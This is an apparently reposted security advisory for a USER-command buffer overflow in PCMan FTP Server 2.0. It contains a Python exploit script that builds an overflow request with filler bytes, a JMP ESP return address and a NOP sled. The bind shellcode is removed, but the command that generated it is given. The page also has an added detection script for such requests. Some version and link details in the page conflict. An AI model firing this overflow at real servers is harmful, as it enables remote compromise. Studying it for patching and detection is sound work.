PCMan FTP Server 'USER' command Buffer Overflow Vulnerability

Source: Internet
Author: User
Tags: signal handler

Release date:
Updated on: 2013-07-02

Affected Systems:
PCMan FTP Server 2.0
Description:
--------------------------------------------------------------------------------
Bugtraq id: 60837
 
PCMan FTP Server is FTP server software.
 
PCMan FTP Server 2.0 contains a stack buffer overflow in its handling of the USER command that allows remote attackers to execute arbitrary code in the context of the affected application.
 
Source: Jacob Holcomb

Link: http://packetstormsecurity.com/files/122173/PCMans-FTP-Server-2.0-Directory-Traversal.html

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
#!/usr/bin/env python3

import signal
from time import sleep
from socket import socket, AF_INET, SOCK_STREAM, inet_aton, inet_ntoa
from sys import exit, exc_info


def sigHandle(signum, frm):  # signal handler for Ctrl+C
    print("\n[!] Cleaning up the exploit... [!]\n")
    sleep(1)
    exit(0)


def targServer():
    # Prompt until a syntactically valid IPv4 address is entered
    while True:
        try:
            server = inet_aton(input("\n[*] Please enter the IPv4 address of the PCMan FTP Server:\n> "))
            server = inet_ntoa(server)
            break
        except Exception:
            print("\n[!] Error: Please enter a valid IPv4 address. [!]\n")
            sleep(1)
            continue
    return server


def main():
    print("""
[*] Title **************************  PCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command
[*] Discovered and Reported ******** June 2013
[*] Discovered/Exploited By ******** Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
[*] Exploit/Advisory *************** http://infosec42.blogspot.com/
[*] Software *********************** PCMan FTP Server v2.0.7 (Listens on TCP/21)
[*] Tested Commands **************** USER (Other commands were not tested and may be vulnerable)
[*] CVE **************************** PCMan FTP Server v2.0.7 Buffer Overflow: Pending
""")
    signal.signal(signal.SIGINT, sigHandle)  # install the Ctrl+C handler

    victim = targServer()
    port = 21
    cmd = b"USER "              # vulnerable command (space separates verb and argument)
    junk = b"\x42" * 2004       # filler up to the saved return address
    ret = b"\x65\x82\xa5\x7c"   # KERNEL32.dll 0x7CA58265 - JMP ESP (little-endian)
    nop = b"\x90" * 50          # NOP sled

    # 348-byte bind shell on TCP/4444, generated by the original author with:
    #   msfpayload windows/shell_bind_tcp EXITFUNC=thread LPORT=4444 R |
    #   msfencode -e x86/shikata_ga_nai -c 1 -b "\x0d\x0a\x00\xf1"
    # The encoded payload bytes from the original post are not reproduced in this listing.
    shellcode = b""

    sploit = cmd + junk + ret + nop + shellcode
    sploit += b"\x42" * (2992 - len(nop + shellcode)) + b"\r\n"

    try:
        print("\n[*] Creating network socket.")
        net_sock = socket(AF_INET, SOCK_STREAM)
    except Exception:
        print("\n[!] There was an error creating the network socket. [!]\n%s\n" % (exc_info(),))
        sleep(1)
        exit(0)

    try:
        print("[*] Connecting to PCMan FTP Server @ %s on port TCP/%d." % (victim, port))
        net_sock.connect((victim, port))
    except Exception:
        print("\n[!] There was an error connecting to %s. [!]\n%s\n" % (victim, exc_info()))
        sleep(1)
        exit(0)

    try:
        print("""[*] Attempting to exploit the ftp user command.
[*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d.
[*] Payload Length: %d bytes.""" % (victim, port, len(sploit)))
        net_sock.send(sploit)
        sleep(1)
    except Exception:
        print("\n[!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!]\n%s\n" % (victim, exc_info()))
        sleep(1)
        exit(0)

    try:
        print("""[*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!
[*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.
""")
        net_sock.close()
    except Exception:
        print("\n[!] There was an error closing the network socket. [!]\n%s\n" % (exc_info(),))
        sleep(1)
        exit(0)


if __name__ == "__main__":
    main()
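As an added example (not part of the original advisory or the exploit author's code), a defender-side check that parses FTP command lines and flags USER arguments that match the overflow pattern the script above sends: an argument thousands of bytes long, padded with 0x42, followed by a raw return address and a NOP sled. The sample lines, the 256-byte ceiling and the function names are constructed assumptions.

```python
# Constructed sample of FTP command lines as a server log or IDS might capture them.
# Line 2 mimics the request built by the exploit above: "USER " + 2004 x 0x42 +
# the little-endian JMP ESP address + a 0x90 NOP sled.
SAMPLE_LINES = [
    b"USER anonymous\r\n",
    b"PASS guest@example.com\r\n",
    b"USER " + b"\x42" * 2004 + b"\x65\x82\xa5\x7c" + b"\x90" * 50 + b"\r\n",
    b"CWD /pub\r\n",
]

# FTP usernames are short; 256 bytes is a generous ceiling (assumption).
MAX_USER_LEN = 256


def parse_ftp_command(line: bytes):
    """Split one FTP command line into (VERB, argument), stripping CRLF."""
    line = line.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    return verb.upper(), arg


def is_suspicious_user(line: bytes) -> bool:
    """True when a USER command carries an argument that looks like an overflow payload."""
    verb, arg = parse_ftp_command(line)
    if verb != b"USER":
        return False
    # Oversized argument: the PCMan overflow needs ~2000 bytes to reach the return address.
    if len(arg) > MAX_USER_LEN:
        return True
    # A NOP sled or any non-printable byte never belongs in a username.
    if b"\x90" * 8 in arg or any(c < 0x20 or c > 0x7E for c in arg):
        return True
    return False


def scan(lines):
    """Return the indices of lines that trip the USER check."""
    return [i for i, line in enumerate(lines) if is_suspicious_user(line)]


if __name__ == "__main__":
    for idx in scan(SAMPLE_LINES):
        print("[!] suspicious USER command at line %d (%d bytes)" % (idx, len(SAMPLE_LINES[idx])))
```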

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
PCMan
-----
At the time of writing, the vendor has not provided a patch or upgrade. Users of the software are advised to watch the vendor's homepage for the latest version:
 
https://files.secureserver.net/1sMltFOsytirTG
